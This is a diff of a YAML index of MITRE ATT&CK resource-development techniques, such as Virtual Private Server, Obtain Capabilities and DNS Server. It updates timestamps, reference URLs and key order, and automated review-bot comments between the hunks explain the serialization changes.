x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -53145,6 +53818,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -53200,7 +53877,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -53258,7 +53934,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -53338,7 +54013,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -53398,7 +54072,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -53420,7 +54093,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
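Review bot: `modified` moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-10-17T16:15:52.805Z'. The same pattern recurs in this diff for Compromise Accounts, Botnet, DNS Server, Social Media Accounts, Exploits and Install Digital Certificate, and in every case the old value is a round 14:00:00.188Z timestamp shared by several unrelated objects, which reads like a bulk stamp being replaced by each object's real upstream `modified` value. That is fine if intended, but anything that sorts or compares techniques by `modified` will now see these objects as older than before; a sentence in the commit message saying the timestamps now mirror upstream would pre-empt the question.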
@@ -53439,42 +54112,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
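Review bot: everything removed in this hunk apart from the `modified` line (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and all four `external_references`) reappears with identical values in the next hunk for the same T1583.003 object, so the substantive change is only the `modified` update plus the additions made there. A reviewer reading this hunk on its own would conclude the references were deleted; please note in the commit message that objects were re-serialized in upstream key order.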
@@ -53483,22 +54124,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
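Review bot: two boolean fields that this object did not carry before, `revoked: false` and `x_mitre_deprecated: false`, appear in the re-serialized T1583.003 block alongside the bump of `x_mitre_attack_spec_version` from 2.1.0 to 3.2.0, the removal of `spec_version`, and `x_mitre_modified_by_ref` moving to the end. Objects in this diff that were not re-serialized (Botnet and DNS Server keep their 2.1.0 blocks) do not gain `revoked`, so the index now mixes objects with and without that key; any consumer filtering on `revoked` must treat a missing key as false. The reference order also changed (Koczwara first, ThreatConnect last) with every `Retrieved` date unchanged, which is consistent with a pure reorder.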
@@ -53512,7 +54184,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -53599,11 +54271,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -53663,7 +54334,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -53705,7 +54375,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53720,7 +54390,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -53811,11 +54480,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -53848,15 +54516,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
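Review bot: the re-wrap of the double-quoted Link Target description now splits a citation tag across two lines, `(Citation: iOS` followed by `URL Scheme)`. Inside a double-quoted YAML scalar a line break folds to a single space, so the parsed value is still `(Citation: iOS URL Scheme)`, but any tooling that greps the raw YAML for `(Citation: ...)` tags to check them against `external_references` will miss this one; the same tag stays on one line in the T1583.001 description above. If the wrapping is produced by the serializer this is acceptable; otherwise prefer a break that does not fall inside a tag.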
@@ -53940,7 +54609,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -53994,7 +54662,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -54045,36 +54712,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -54083,21 +54724,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
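Review bot: the 'Recorded Future Beacon 2019' reference gets a new URL (`/blog/identifying-cobalt-strike-servers` replacing `/identifying-cobalt-strike-servers/`) and its `Retrieved` date moves to September 16, 2024, which matches the object's new `modified` timestamp of 2024-09-16; the 'Analyzing CS Dec 2020' entry keeps its 2021 retrieval date, which is correct since its URL is unchanged. The parent T1588 object, whose removed block at the end of this excerpt still lists `https://www.recordedfuture.com/cobalt-strike-servers/` for 'Recorded Future Beacon Certificates', is re-serialized outside this excerpt; check that its URL was refreshed to the same site layout.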
@@ -54143,17 +54810,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -54179,7 +54845,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -54211,8 +54877,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
@@ -54239,7 +54903,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -54263,8 +54927,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -54290,7 +54952,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -54324,8 +54986,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -54373,7 +55033,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -54389,7 +55049,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -54448,54 +55107,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
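Review bot: this hunk and the next are almost entirely a key reorder of the T1588 block (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and all eight `external_references` entries are deleted here and re-added below in a different order), and the same happens for T1587 and T1592 further down. I checked that the eight reference `source_name`s removed here (`mitre-attack`, `NationsBuying`, `PegasusCitizenLab`, `DiginotarCompromise`, `FireEyeSupplyChain`, `Analyzing CS Dec 2020`, `Splunk Kovar Certificates 2017`, `Recorded Future Beacon Certificates`) all reappear, so nothing is lost. To keep future regenerations reviewable, have the generator emit keys in a stable order (sorted, or the upstream STIX object's order) so that a single reference URL fix does not show up as a 60-line rewrite.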
@@ -54506,22 +55121,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
